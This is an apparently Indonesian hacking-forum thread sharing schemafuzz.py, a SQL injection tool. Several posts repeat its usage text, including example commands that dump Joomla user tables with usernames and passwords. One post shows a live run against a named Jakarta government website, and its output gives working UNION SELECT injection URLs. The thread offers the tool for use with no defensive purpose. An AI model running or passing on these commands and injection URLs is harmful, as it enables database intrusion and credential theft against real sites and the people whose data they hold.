IBC chat

ShoutMix chat widget
Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search

Tua oke...

View previous topic View next topic Go down

Tua oke...

Post  g34rboxxx on Tue Jun 08, 2010 7:58 pm

schemafuzz.pl .... find in google ..


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
Try it .... and feel it ....

g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 40
Location : Tebak hayooo

View user profile

Back to top Go down

Re: Tua oke...

Post  vailo on Tue Jun 08, 2010 9:29 pm

g34rboxxx wrote:schemafuzz.pl .... find in google ..


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
Try it .... and feel it ....

affraid affraid affraid what d'....?! deskripsi nan penjelasannya pilzzz... bounce bounce bounce

vailo

Posts : 137
Join date : 2009-10-18

View user profile

Back to top Go down

Re: Tua oke...

Post  g34rboxxx on Tue Jul 06, 2010 4:19 pm


Use python ...bisa di win32/linux..
Buka cmd .... jangan lupa install dulu pythonnya ....download dari mbah google ya ....
Razz Razz Razz ....trus buka seperti ini ...


C:\Python26>python.exe schemafuzz.py -h

tekan enter hasilnya


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,d
arkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"

contoh :
C:\Python26>python.exe schemafuzz.py --findcol -u "http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1"

hasilnya

Code:

| rsauron[@]gmail[dot]com                                v5.0  |
|  6/2008      schemafuzz.py                                  |
|      -MySQL v5+ Information_schema Database Enumeration      |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                        |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1--
[+] Evasion Used: "+" "--"
[+] 15:57:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,
[+] Column Length is: 8
[+] Found null column at column #: 1
[+] SQLi URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1+AND+1=2+UNION+
SELECT+0,1,2,3,4,5,6,7--
[+] darkc0de URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1+AND+1=2+UN
ION+SELECT+0,darkc0de,2,3,4,5,6,7
[-] Done!

g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 40
Location : Tebak hayooo

View user profile

Back to top Go down

Re: Tua oke...

Post  sinax89 on Mon Jul 26, 2010 1:44 pm

wah.... ini teknik yang pake darcode... sya pernah coba ..!! memang ampuh nie scrip schemafuzz.py..... jadi teringat masa lalu... hehe...

sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 27
Location : Bekasi

View user profile http://ibc-forum.forumc.biz

Back to top Go down

Re: Tua oke...

Post  Sponsored content Today at 10:20 pm


Sponsored content


Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum